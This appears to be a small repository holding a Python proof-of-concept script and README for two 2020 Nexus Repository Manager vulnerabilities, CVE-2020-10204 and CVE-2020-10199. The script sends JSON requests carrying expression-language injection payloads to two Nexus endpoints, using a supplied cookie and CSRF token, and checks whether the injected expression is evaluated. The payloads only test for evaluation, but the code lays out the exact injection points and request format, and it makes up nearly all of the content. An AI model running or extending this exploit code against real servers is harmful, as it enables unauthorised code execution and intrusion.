├── Nexus-CVE-2020-POC.py
└── README.md


/Nexus-CVE-2020-POC.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin python3
 2 | import requests
 3 | import argparse
 4 | import json
 5 | 
 6 | parse = argparse.ArgumentParser()
 7 | parse.add_argument('-i', '--ip', help='ip')
 8 | parse.add_argument('-p', '--port', default='8081', help='port')
 9 | parse.add_argument('-c', '--cookie', help='HTTP cookie')
10 | parse.add_argument('-csrf', '--csrf', help='NX-ANTI-CSRF-TOKEN')
11 | args = parse.parse_args()
12 | 
13 | Origin = "http://" + str(args.ip) + ":" + str(args.port)
14 | 
15 | host = str(args.ip) + ":" + str(args.port)
16 | 
17 | 
18 | headers = {
19 |     "Host": host,
20 |     "Referer": Origin,
21 |     "X-Nexus-UI": "true",
22 |     "X-Requested-With": "XMLHttpRequest",
23 |     "NX-ANTI-CSRF-TOKEN": args.csrf,
24 |     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
25 |     "Accept": "application/json, text/plain, */*",
26 |     "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
27 |     "Accept-Encoding": "gzip, deflate",
28 |     "Content-Type": "application/json",
29 |     "cooKie": args.cookie,
30 |     "Origin": Origin,
31 |     "Connection": "close"
32 | }
33 | 
34 | # CVE-2020-10204 POC
35 | url1 = "http://" + str(args.ip) + ":" + str(args.port) + "/service/extdirect"
36 | form_data1 = {"action": "coreui_User", "method": "update", "data": [
37 |     {"userId": "test", "version": "1.0", "firstName": "xxx", "lastName": "xxx", "email": "test@qq.com",
38 |      "status": "active", "roles": ["$+{'this is vulnerability'.toUpperCase()}"]}], "type": "rpc", "tid": 7}
39 | results1 = requests.post(url1, data=json.dumps(form_data1), headers=headers).text
40 | if "this is vulnerability" in results1:
41 |     print("[*] CVE-2020-10204 vulnerability exists.")
42 | else:
43 |     print("[*] CVE-2020-10204 vulnerability does not exist.")
44 | 
45 | # CVE-2020-10199 POC
46 | url = "http://" + str(args.ip) + ":" + str(args.port) + "/service/rest/beta/repositories/go/group"
47 | form_data = {"name": "internal", "online": "true",
48 |              "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"},
49 |              "group": {"memberNames": ["${'this is vulnerability'.toUpperCase()}"]}}
50 | results = requests.post(url, data=json.dumps(form_data), headers=headers).text
51 | if "this is vulnerability" in results:
52 |     print("[*] CVE-2020-10199 vulnerability exists.")
53 | else:
54 |     print("[*] CVE-2020-10199 vulnerability does not exist.")
55 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2020-10199-10204
 2 | 
 3 | http://1984-0day.com
 4 | 
 5 | ```
 6 | python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token
 7 | 
 8 | parse = argparse.ArgumentParser()
 9 | parse.add_argument('-i', '--ip', help='ip')
10 | parse.add_argument('-p', '--port', default='8081', help='port')
11 | parse.add_argument('-c', '--cookie',  help='HTTP cookie')
12 | parse.add_argument('-csrf', '--csrf',  help='NX-ANTI-CSRF-TOKEN')
13 | ```
14 | 


--------------------------------------------------------------------------------